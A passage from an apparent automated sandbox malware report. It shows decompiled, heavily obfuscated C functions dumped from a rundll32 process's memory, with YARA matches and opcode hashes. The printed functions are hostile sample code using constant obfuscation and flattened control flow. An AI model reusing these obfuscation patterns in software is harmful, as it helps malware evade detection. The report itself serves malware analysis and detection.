                                                                      				_v32 = 0xa29f;
                                                                      				_v32 = _v32 ^ 0x4f38ff35;
                                                                      				_v32 = _v32 ^ 0x0f385daa;
                                                                      				_v40 = 0xdb0c;
                                                                      				_v40 = _v40 << 0xc;
                                                                      				_v40 = _v40 | 0xd75e623d;
                                                                      				_v40 = _v40 ^ 0x9ffee23d;
                                                                      				_v48 = 0x5711;
                                                                      				_v48 = _v48 >> 0xb;
                                                                      				_v48 = _v48 + 0x4c96;
                                                                      				_v48 = _v48 ^ 0x0000622c;
                                                                      				_v28 = 0x2a8d;
                                                                      				_v28 = _v28 ^ 0x2576f3ca;
                                                                      				_v28 = _v28 ^ 0x2576c47f;
                                                                      				_v52 = 0x1d31;
                                                                      				_v52 = _v52 | 0x18ed216c;
                                                                      				_v52 = _v52 * 0x26;
                                                                      				_v52 = _v52 ^ 0xb3370705;
                                                                      				_v36 = 0x506d;
                                                                      				_v36 = _v36 << 1;
                                                                      				_v36 = _v36 ^ 0x0000af41;
                                                                      				_v56 = 0xd618;
                                                                      				_v56 = _v56 + 0x2bfb;
                                                                      				_v56 = _v56 / _t182;
                                                                      				_v56 = _v56 ^ 0x00007f84;
                                                                      				_v20 = 0x7a02;
                                                                      				_v20 = _v20 + 0xffff09b4;
                                                                      				_v20 = _v20 ^ 0xffffb01c;
                                                                      				_v24 = 0x46f3;
                                                                      				_v24 = _v24 << 0xe;
                                                                      				_v24 = _v24 ^ 0x11bc9893;
                                                                      				_v60 = 0xd2ca;
                                                                      				_v60 = _v60 | 0xbe7a55a5;
                                                                      				_v60 = _v60 << 8;
                                                                      				_v60 = _v60 + 0xffffc5fa;
                                                                      				_v60 = _v60 ^ 0x7ad789b6;
                                                                      				_v8 = 0x5705;
                                                                      				_v8 = _v8 + 0xffff783c;
                                                                      				_v8 = _v8 ^ 0xfffff995;
                                                                      				_v64 = 0x2f3b;
                                                                      				_v64 = _v64 >> 6;
                                                                      				_v64 = _v64 + 0x79a7;
                                                                      				_t183 = 0x7a;
                                                                      				_v64 = _v64 / _t183;
                                                                      				_v64 = _v64 ^ 0x00001190;
                                                                      				_v16 = 0x22f9;
                                                                      				_v16 = _v16 | 0x259e41a8;
                                                                      				_v16 = _v16 ^ 0x259e7296;
                                                                      				_v44 = 0x5159;
                                                                      				_v44 = _v44 | 0xb37bb685;
                                                                      				_v44 = _v44 ^ 0x9f6900dd;
                                                                      				_v44 = _v44 ^ 0x2c12c002;
                                                                      				while(_t167 != 0x120b6438) {
                                                                      					if(_t167 == 0x257cf60e) {
                                                                      						E01FF4282(_v60, _v8, _v64, _a8, _t185, _v40 | _v12,  &_v4, _v16, _v44, _a4);
                                                                      					} else {
                                                                      						if(_t167 == 0x2df92bb4) {
                                                                      							_push(_t167);
                                                                      							_t185 = E01FF54FB(_v4 + _v4);
                                                                      							if(_t185 != 0) {
                                                                      								_t167 = 0x257cf60e;
                                                                      								continue;
                                                                      							}
                                                                      						} else {
                                                                      							if(_t167 != 0x39df0674) {
                                                                      								L10:
                                                                      								if(_t167 != 0x1bf2cd07) {
                                                                      									continue;
                                                                      								} else {
                                                                      								}
                                                                      							} else {
                                                                      								_t164 = E01FF4282(_v48, _v28, _v52, _a8, 0, _v32 | _v68,  &_v4, _v36, _v56, _a4);
                                                                      								_t188 =  &(_t188[8]);
                                                                      								if(_t164 != 0) {
                                                                      									_t167 = 0x2df92bb4;
                                                                      									continue;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					return _t185;
                                                                      				}
                                                                      				_t167 = 0x39df0674;
                                                                      				goto L10;
                                                                      			}

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ;/$YQ$mP
                                                                      • API String ID: 0-3666080072
                                                                      • Opcode ID: 47880b2951c1e1c441204921e8a5573947b7b5d1dd38183dfbb91e3983d3d2ca
                                                                      • Instruction ID: b37b491326d180595c0dc4bee9dd9c2d12feb666b29a509fbb0395fcaab0effc
                                                                      • Opcode Fuzzy Hash: 47880b2951c1e1c441204921e8a5573947b7b5d1dd38183dfbb91e3983d3d2ca
                                                                      • Instruction Fuzzy Hash: 8F7121B11083419BE398CF65C98981FFBE1BBD4758F044A1DF29A562A0D3B6CA08CB47
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ;/$YQ$mP
                                                                      • API String ID: 0-3666080072
                                                                      • Opcode ID: a4894dc86a31309ad7004ee06dbd5a022662d05678d9d1ed36526e4b0c62e3ff
                                                                      • Instruction ID: b325284e45d21ca3d456e56db64d22a238a615128923031b1a632804fb336c2c
                                                                      • Opcode Fuzzy Hash: a4894dc86a31309ad7004ee06dbd5a022662d05678d9d1ed36526e4b0c62e3ff
                                                                      • Instruction Fuzzy Hash: 607120B21193419BD368CF61C98981FFBE2BBC4758F104A1DF29696260D3B5CA58CF47
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 95%
                                                                      			E01FFC145(void* __ecx) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				signed int _v48;
                                                                      				signed int _v52;
                                                                      				signed int _v56;
                                                                      				signed int _v60;
                                                                      				void* _v72;
                                                                      				intOrPtr _v76;
                                                                      				void* _t158;
                                                                      				void* _t162;
                                                                      				signed int _t164;
                                                                      				signed int _t165;
                                                                      				signed int _t166;
                                                                      				intOrPtr* _t187;
                                                                      				signed int _t188;
                                                                      				intOrPtr* _t189;
                                                                      				void* _t190;
                                                                      
                                                                      				_v76 = 0x4e59b3;
                                                                      				asm("stosd");
                                                                      				_t162 = __ecx;
                                                                      				_t164 = 0x15;
                                                                      				asm("stosd");
                                                                      				_t188 = 9;
                                                                      				asm("stosd");
                                                                      				_v12 = 0xc9c5;
                                                                      				_t187 = 0x2011084;
                                                                      				_v12 = _v12 >> 0xb;
                                                                      				_v12 = _v12 * 0x7d;
                                                                      				_v12 = _v12 * 0x52;
                                                                      				_v12 = _v12 ^ 0x0003e898;
                                                                      				_v8 = 0x326b;
                                                                      				_v8 = _v8 ^ 0x4a0ebab0;
                                                                      				_v8 = _v8 * 0x1a;
                                                                      				_v8 = _v8 >> 0xc;
                                                                      				_v8 = _v8 ^ 0x0008366f;
                                                                      				_v40 = 0x35fc;
                                                                      				_v40 = _v40 | 0x4fdc2f8a;
                                                                      				_v40 = _v40 ^ 0x4fdc2023;
                                                                      				_v48 = 0xbcdb;
                                                                      				_v48 = _v48 + 0x5d48;
                                                                      				_v48 = _v48 ^ 0x00014504;
                                                                      				_v20 = 0xc333;
                                                                      				_v20 = _v20 << 6;
                                                                      				_v20 = _v20 + 0xab7c;
                                                                      				_v20 = _v20 ^ 0x90b5416b;
                                                                      				_v20 = _v20 ^ 0x90846b09;
                                                                      				_v44 = 0xaf61;
                                                                      				_v44 = _v44 >> 0xf;
                                                                      				_v44 = _v44 ^ 0x0000016e;
                                                                      				_v32 = 0xeeb1;
                                                                      				_v32 = _v32 / _t164;
                                                                      				_v32 = _v32 << 2;
                                                                      				_v32 = _v32 ^ 0x0000131e;
                                                                      				_v56 = 0x101;
                                                                      				_v56 = _v56 << 7;
                                                                      				_v56 = _v56 ^ 0x0000810a;
                                                                      				_v24 = 0x5cc;
                                                                      				_v24 = _v24 << 0xb;
                                                                      				_t165 = 0x68;
                                                                      				_v24 = _v24 * 0x53;
                                                                      				_v24 = _v24 / _t188;
                                                                      				_v24 = _v24 ^ 0x01abf608;
                                                                      				_v36 = 0x9340;
                                                                      				_v36 = _v36 << 4;
                                                                      				_v36 = _v36 * 0x3d;
                                                                      				_v36 = _v36 ^ 0x02311cdc;
                                                                      				_v52 = 0xb9f4;
                                                                      				_v52 = _v52 << 0xc;
                                                                      				_v52 = _v52 ^ 0x0b9f20c2;
                                                                      				_v28 = 0x28eb;
                                                                      				_v28 = _v28 << 0xb;
                                                                      				_v28 = _v28 << 5;
                                                                      				_v28 = _v28 >> 3;
                                                                      				_v28 = _v28 ^ 0x051d1262;
                                                                      				_v60 = 0xd87b;
                                                                      				_v60 = _v60 / _t165;
                                                                      				_v60 = _v60 ^ 0x00004114;
                                                                      				_v16 = 0x63a3;
                                                                      				_v16 = _v16 ^ 0x0cdbf93f;
                                                                      				_t166 = 0x44;
                                                                      				_v16 = _v16 / _t166;
                                                                      				_v16 = _v16 / _t188;
                                                                      				_v16 = _v16 ^ 0x000560e1;
                                                                      				_t189 =  *0x2011084;
                                                                      				while(_t189 != 0) {
                                                                      					if( *((intOrPtr*)(_t189 + 8)) == 0) {
                                                                      						L4:
                                                                      						 *_t187 =  *_t189;
                                                                      						_t158 = E01FFDE81(_v28, _t189, _v60);
                                                                      					} else {
                                                                      						_t158 = E0200C631(_v12, _t162,  *((intOrPtr*)(_t189 + 0x28)), _v8, _v40);
                                                                      						_t190 = _t190 + 0xc;
                                                                      						if(_t158 != _v16) {
                                                                      							_t187 = _t189;
                                                                      						} else {
                                                                      							 *((intOrPtr*)(_t189 + 0x18))( *((intOrPtr*)(_t189 + 8)), 0, 0);
                                                                      							E0200A8BF(_v48, _v20, _v44, _v32,  *((intOrPtr*)(_t189 + 8)));
                                                                      							E01FFF1ED(_v56, _v24, _v36, _v52,  *((intOrPtr*)(_t189 + 0x28)));
                                                                      							_t190 = _t190 + 0x18;
                                                                      							goto L4;
                                                                      						}
                                                                      					}
                                                                      					_t189 =  *_t187;
                                                                      				}
                                                                      				return _t158;
                                                                      			}

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: H]$k2$(
                                                                      • API String ID: 0-1078215326
                                                                      • Opcode ID: e5bf22525b87c84787ab1fe5a4eee87b6e3f636bafc8a5aa866c42992b4ec353
                                                                      • Instruction ID: 4152ff6d11c21e6089e889e64b474cd01f456350407b1abce95a00221204ce73
                                                                      • Opcode Fuzzy Hash: e5bf22525b87c84787ab1fe5a4eee87b6e3f636bafc8a5aa866c42992b4ec353
                                                                      • Instruction Fuzzy Hash: 04611F71D00209EBEF09CFA5C9899DEFBB2FF48314F208059D511B62A0C3B95A49CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: H]$k2$(
                                                                      • API String ID: 0-1078215326
                                                                      • Opcode ID: 417b0d0813bbd395ec3401c326ec1af0fcf2898957f5341b52308ebd17ef56fd
                                                                      • Instruction ID: 2b22431085bc2340c3dfef24cc19526d02e41de9c9e9f4383d41a177b116af6e
                                                                      • Opcode Fuzzy Hash: 417b0d0813bbd395ec3401c326ec1af0fcf2898957f5341b52308ebd17ef56fd
                                                                      • Instruction Fuzzy Hash: C36111B1D01209EBDF09CFA5D98A5DEFBB2FF48318F208059D511B62A0C3B85A49CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 91%
                                                                      			E01FFF5E0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                      				char _v68;
                                                                      				signed int _v72;
                                                                      				signed int _v76;
                                                                      				signed int _v80;
                                                                      				signed int _v84;
                                                                      				signed int _v88;
                                                                      				signed int _v92;
                                                                      				signed int _v96;
                                                                      				signed int _v100;
                                                                      				signed int _v104;
                                                                      				signed int _v108;
                                                                      				void* _t108;
                                                                      				void* _t120;
                                                                      				signed int _t126;
                                                                      				signed int _t127;
                                                                      				signed int _t128;
                                                                      				void* _t131;
                                                                      				void* _t148;
                                                                      				signed int* _t151;
                                                                      
                                                                      				_push(_a16);
                                                                      				_t147 = _a8;
                                                                      				_push(_a12);
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__edx);
                                                                      				_push(__ecx);
                                                                      				E02002550(_t108);
                                                                      				_v100 = 0xbd2b;
                                                                      				_t151 =  &(( &_v108)[6]);
                                                                      				_v100 = _v100 + 0xc830;
                                                                      				_v100 = _v100 ^ 0xf25ece92;
                                                                      				_t148 = 0;
                                                                      				_v100 = _v100 ^ 0x67839fcf;
                                                                      				_t131 = 0x1bb8a706;
                                                                      				_v100 = _v100 ^ 0x95dca476;
                                                                      				_v104 = 0xe5f5;
                                                                      				_v104 = _v104 ^ 0x3a2ce663;
                                                                      				_v104 = _v104 + 0x2b7;
                                                                      				_v104 = _v104 + 0xfffff7b7;
                                                                      				_v104 = _v104 ^ 0x3a2bd932;
                                                                      				_v108 = 0xdd91;
                                                                      				_t126 = 0x78;
                                                                      				_v108 = _v108 / _t126;
                                                                      				_v108 = _v108 << 3;
                                                                      				_v108 = _v108 | 0x72d1b8ea;
                                                                      				_v108 = _v108 ^ 0x72d1fa04;
                                                                      				_v76 = 0xd4ee;
                                                                      				_t127 = 0x31;
                                                                      				_v76 = _v76 * 0x6a;
                                                                      				_v76 = _v76 ^ 0x0058075c;
                                                                      				_v84 = 0x2487;
                                                                      				_v84 = _v84 << 0xd;
                                                                      				_v84 = _v84 / _t127;
                                                                      				_v84 = _v84 ^ 0x0017b008;
                                                                      				_v96 = 0x31db;
                                                                      				_v96 = _v96 ^ 0x255ec927;
                                                                      				_v96 = _v96 + 0x2f88;
                                                                      				_v96 = _v96 >> 0x10;
                                                                      				_v96 = _v96 ^ 0x000038c6;
                                                                      				_v72 = 0x5e58;
                                                                      				_v72 = _v72 + 0xffff066f;
                                                                      				_v72 = _v72 ^ 0xffff345d;
                                                                      				_v80 = 0x2e99;
                                                                      				_v80 = _v80 | 0xfff3fbee;
                                                                      				_v80 = _v80 ^ 0xfff3b346;
                                                                      				_v88 = 0x63de;
                                                                      				_t128 = 0x6e;
                                                                      				_v88 = _v88 / _t128;
                                                                      				_v88 = _v88 >> 7;
                                                                      				_v88 = _v88 + 0x451f;
                                                                      				_v88 = _v88 ^ 0x0000098b;
                                                                      				_v92 = 0x3ecb;
                                                                      				_v92 = _v92 * 0x6a;
                                                                      				_v92 = _v92 * 0x70;
                                                                      				_v92 = _v92 * 0x17;
                                                                      				_v92 = _v92 ^ 0x05a0db37;
                                                                      				do {
                                                                      					while(_t131 != 0x2106865) {
                                                                      						if(_t131 == 0x1bb8a706) {
                                                                      							_t131 = 0x222f3472;
                                                                      							continue;
                                                                      						} else {
                                                                      							if(_t131 == 0x222f3472) {
                                                                      								E01FFFEE3(_a12,  &_v68, _v100, _v104, _v108, _v76);
                                                                      								_t151 =  &(_t151[4]);
                                                                      								_t131 = 0x2106865;
                                                                      								continue;
                                                                      							} else {
                                                                      								_t157 = _t131 - 0x2cd0632e;
                                                                      								if(_t131 != 0x2cd0632e) {
                                                                      									goto L12;
                                                                      								} else {
                                                                      									E01FFF914(_v72, _v80, _t157, _v88, _t147 + 4, _v92,  &_v68);
                                                                      									_t148 =  !=  ? 1 : _t148;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						L6:
                                                                      						return _t148;
                                                                      					}
                                                                      					_t120 = E01FFBAA2( &_v68, _v84, _v96, _t147);
                                                                      					_t151 =  &(_t151[2]);
                                                                      					__eflags = _t120;
                                                                      					if(__eflags == 0) {
                                                                      						_t131 = 0x9b007f1;
                                                                      						goto L12;
                                                                      					} else {
                                                                      						_t131 = 0x2cd0632e;
                                                                      						continue;
                                                                      					}
                                                                      					goto L6;
                                                                      					L12:
                                                                      					__eflags = _t131 - 0x9b007f1;
                                                                      				} while (__eflags != 0);
                                                                      				goto L6;
                                                                      			}
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: X^$c,:$r4/"
                                                                      • API String ID: 0-1154924512
                                                                      • Opcode ID: ee755c4278271f96210a97fe9531c3849dfc2dbf006185a258316c46e1c648fd
                                                                      • Instruction ID: 077ad54a0e454bc6c4fbb9375f81396d9bc4cac7e04e426601fbeeab4066a08f
                                                                      • Opcode Fuzzy Hash: ee755c4278271f96210a97fe9531c3849dfc2dbf006185a258316c46e1c648fd
                                                                      • Instruction Fuzzy Hash: D8515772508382DBD754CE24C98581BFBE5FFC8708F504A1DF5C6A62A0D7B68A09CB97
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: X^$c,:$r4/"
                                                                      • API String ID: 0-1154924512
                                                                      • Opcode ID: b0f91960b31b42c11a33f64cea1bf467d0de1a54f0e0d13f0772bb0d76042489
                                                                      • Instruction ID: 68cf62b81439963f641c6bca7bb27c81cfe2e588007d2f7d6506a7bca8626f1c
                                                                      • Opcode Fuzzy Hash: b0f91960b31b42c11a33f64cea1bf467d0de1a54f0e0d13f0772bb0d76042489
                                                                      • Instruction Fuzzy Hash: BE5168B21083829BD758CF20C98681FFBE5FBC8708F405A1DF4C5A62A0D7758A19CB43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E01FF3FAF() {
                                                                      				signed char _v2;
                                                                      				signed int _v276;
                                                                      				signed int _v280;
                                                                      				char _v284;
                                                                      				signed short _v320;
                                                                      				intOrPtr _v324;
                                                                      				intOrPtr _v328;
                                                                      				signed int _v332;
                                                                      				signed int _v336;
                                                                      				signed int _v340;
                                                                      				signed int _v344;
                                                                      				signed int _v348;
                                                                      				signed int _v352;
                                                                      				signed int _v356;
                                                                      				void* _t97;
                                                                      				signed int _t111;
                                                                      				signed int _t112;
                                                                      				signed int _t113;
                                                                      				intOrPtr _t115;
                                                                      				signed int* _t117;
                                                                      
                                                                      				_t117 =  &_v356;
                                                                      				_v328 = 0x3138;
                                                                      				_t115 = 0;
                                                                      				_t97 = 0x33d529cc;
                                                                      				_v324 = 0;
                                                                      				_v344 = 0x9123;
                                                                      				_v344 = _v344 | 0x5a808bd5;
                                                                      				_v344 = _v344 + 0xeb06;
                                                                      				_v344 = _v344 ^ 0x5a818485;
                                                                      				_v340 = 0xc804;
                                                                      				_t111 = 0x44;
                                                                      				_v340 = _v340 * 0x5f;
                                                                      				_v340 = _v340 | 0x7b6fdd9e;
                                                                      				_v340 = _v340 ^ 0x7b6fb88e;
                                                                      				_v348 = 0x9154;
                                                                      				_v348 = _v348 / _t111;
                                                                      				_v348 = _v348 + 0x2621;
                                                                      				_v348 = _v348 >> 7;
                                                                      				_v348 = _v348 ^ 0x00001b68;
                                                                      				_v336 = 0x690d;
                                                                      				_v336 = _v336 >> 0xa;
                                                                      				_v336 = _v336 ^ 0x0000404b;
                                                                      				_v356 = 0x945a;
                                                                      				_v356 = _v356 >> 0x10;
                                                                      				_v356 = _v356 << 9;
                                                                      				_t112 = 0x5d;
                                                                      				_v356 = _v356 / _t112;
                                                                      				_v356 = _v356 ^ 0x00005b50;
                                                                      				_v332 = 0xb02a;
                                                                      				_t113 = 0x60;
                                                                      				_v332 = _v332 / _t113;
                                                                      				_v332 = _v332 ^ 0x000056d0;
                                                                      				_v352 = 0x389b;
                                                                      				_v352 = _v352 * 0x54;
                                                                      				_v352 = _v352 << 0xf;
                                                                      				_v352 = _v352 + 0xffffdcc7;
                                                                      				_v352 = _v352 ^ 0x496daad3;
                                                                      				do {
                                                                      					while(_t97 != 0xe09bda3) {
                                                                      						if(_t97 == 0x15edbb33) {
                                                                      							_t97 = 0x37fd0e9f;
                                                                      							_t115 = _t115 + _v276 * 0x64;
                                                                      							continue;
                                                                      						} else {
                                                                      							if(_t97 == 0x1cbb7e54) {
                                                                      								_t97 = 0x2caaacac;
                                                                      								_t115 = _t115 + (_v2 & 0x000000ff) * 0x186a0;
                                                                      								continue;
                                                                      							} else {
                                                                      								if(_t97 == 0x213f0da0) {
                                                                      									E01FFB9F2( &_v320, _v356, _v332, _v352);
                                                                      									_t97 = 0x1cbb7e54;
                                                                      									continue;
                                                                      								} else {
                                                                      									if(_t97 == 0x2caaacac) {
                                                                      										_t97 = 0x15edbb33;
                                                                      										_t115 = _t115 + _v280 * 0x3e8;
                                                                      										continue;
                                                                      									} else {
                                                                      										if(_t97 == 0x33d529cc) {
                                                                      											_t97 = 0xe09bda3;
                                                                      											continue;
                                                                      										} else {
                                                                      											if(_t97 != 0x37fd0e9f) {
                                                                      												goto L16;
                                                                      											} else {
                                                                      												_t115 = _t115 + (_v320 & 0x0000ffff);
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						L9:
                                                                      						return _t115;
                                                                      					}
                                                                      					_v284 = 0x11c;
                                                                      					E0200279F(_v344, _v340, _v348, _v336,  &_v284);
                                                                      					_t117 =  &(_t117[3]);
                                                                      					_t97 = 0x213f0da0;
                                                                      					L16:
                                                                      				} while (_t97 != 0x23841290);
                                                                      				goto L9;
                                                                      			}
























                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !&$K@$P[
                                                                      • API String ID: 0-2917137494
                                                                      • Opcode ID: 5b4b2cc8b968ca566717441e5ac86746a7073d49ca386277a7409c9bdfb8209a
                                                                      • Instruction ID: e7c032a21e9e1502ed53dc11de5d2ee6c0ff148a2ec2ca5958319e04091a8a14
                                                                      • Opcode Fuzzy Hash: 5b4b2cc8b968ca566717441e5ac86746a7073d49ca386277a7409c9bdfb8209a
                                                                      • Instruction Fuzzy Hash: 7B417C71608305CBD718CE29D48502FBBE5AFD4754F14491EF695A62A0D3B68A0A8F93
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !&$K@$P[
                                                                      • API String ID: 0-2917137494
                                                                      • Opcode ID: 5b4b2cc8b968ca566717441e5ac86746a7073d49ca386277a7409c9bdfb8209a
                                                                      • Instruction ID: 9a442d3e769083969182367857642a03c16f001163f0853e061dcb92f61664b8
                                                                      • Opcode Fuzzy Hash: 5b4b2cc8b968ca566717441e5ac86746a7073d49ca386277a7409c9bdfb8209a
                                                                      • Instruction Fuzzy Hash: 98419BB02183429FD718CE25D48602FFBE5ABC4758F14491EF496AA2A0D375CB1E8F97
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 79%
                                                                      			E01FF35FC(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				unsigned int _v48;
                                                                      				signed int _v52;
                                                                      				void* _t106;
                                                                      				signed int _t118;
                                                                      				signed int _t119;
                                                                      
                                                                      				_push(_a20);
                                                                      				_push(_a16);
                                                                      				_push(_a12);
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__edx);
                                                                      				_push(__ecx);
                                                                      				E02002550(_t106);
                                                                      				_v24 = 0x9798;
                                                                      				_v24 = _v24 + 0xffffbd22;
                                                                      				_v24 = _v24 + 0x641e;
                                                                      				_v24 = _v24 ^ 0x0000a020;
                                                                      				_v36 = 0x61df;
                                                                      				_t118 = 0x59;
                                                                      				_v36 = _v36 * 0x26;
                                                                      				_v36 = _v36 ^ 0x000edcfe;
                                                                      				_v32 = 0xcd5;
                                                                      				_v32 = _v32 ^ 0xf6eb11a6;
                                                                      				_v32 = _v32 ^ 0xf6eb5e3d;
                                                                      				_v28 = 0x5819;
                                                                      				_v28 = _v28 | 0xf42f747a;
                                                                      				_v28 = _v28 ^ 0xf42f4692;
                                                                      				_v48 = 0xdcf0;
                                                                      				_v48 = _v48 >> 4;
                                                                      				_v48 = _v48 ^ 0x00002f29;
                                                                      				_v44 = 0x97e5;
                                                                      				_t119 = 0x6a;
                                                                      				_v44 = _v44 / _t118;
                                                                      				_v44 = _v44 ^ 0x00000ed0;
                                                                      				_v12 = 0xa421;
                                                                      				_v12 = _v12 | 0x274c75f9;
                                                                      				_v12 = _v12 + 0x5ba7;
                                                                      				_v12 = _v12 << 0xa;
                                                                      				_v12 = _v12 ^ 0x3546b17c;
                                                                      				_v40 = 0x78dd;
                                                                      				_v40 = _v40 >> 0xd;
                                                                      				_v40 = _v40 ^ 0x00007b97;
                                                                      				_v8 = 0xdcde;
                                                                      				_v8 = _v8 | 0x90b63865;
                                                                      				_v8 = _v8 + 0xeb12;
                                                                      				_push(0x1ff13dc);
                                                                      				_v8 = _v8 * 0x27;
                                                                      				_v8 = _v8 ^ 0x0c047073;
                                                                      				_v20 = 0xf013;
                                                                      				_v20 = _v20 ^ 0x6a2eccf0;
                                                                      				_v20 = _v20 << 7;
                                                                      				_v20 = _v20 >> 7;
                                                                      				_v20 = _v20 ^ 0x002e686d;
                                                                      				_v52 = 0xca9e;
                                                                      				_v52 = _v52 + 0xffffaa95;
                                                                      				_v52 = _v52 ^ 0x00003a71;
                                                                      				_v16 = 0x1985;
                                                                      				_v16 = _v16 ^ 0x7d67dffe;
                                                                      				_v16 = _v16 | 0x92ef9f7f;
                                                                      				_v16 = _v16 / _t119;
                                                                      				_v16 = _v16 ^ 0x026a2075;
                                                                      				_push(_v28);
                                                                      				_push(_v32);
                                                                      				E01FFA4D7(_v16, _v44, _v12, _v40, _v8, E01FF5DFC(_v24, _v36, _v16), _a20, _a12, __ecx);
                                                                      				return E02000D6D(_v20, _v52, _v16, _t114);
                                                                      			}



















                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: )/$mh.$q:
                                                                      • API String ID: 0-1096206879
                                                                      • Opcode ID: baadf8516e41e57158cac1776ef02908ebad985f4a9e4f0354fb67aaff5d33bf
                                                                      • Instruction ID: 54a7636f0b23cf88ea961cdf2144abc10a871b398cd6da132c2aa136a18169bc
                                                                      • Opcode Fuzzy Hash: baadf8516e41e57158cac1776ef02908ebad985f4a9e4f0354fb67aaff5d33bf
                                                                      • Instruction Fuzzy Hash: 1E410272D0021DEBEF09CFA1C94A8DEBFB2FB08314F108159E911761A0D7B90A15DFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
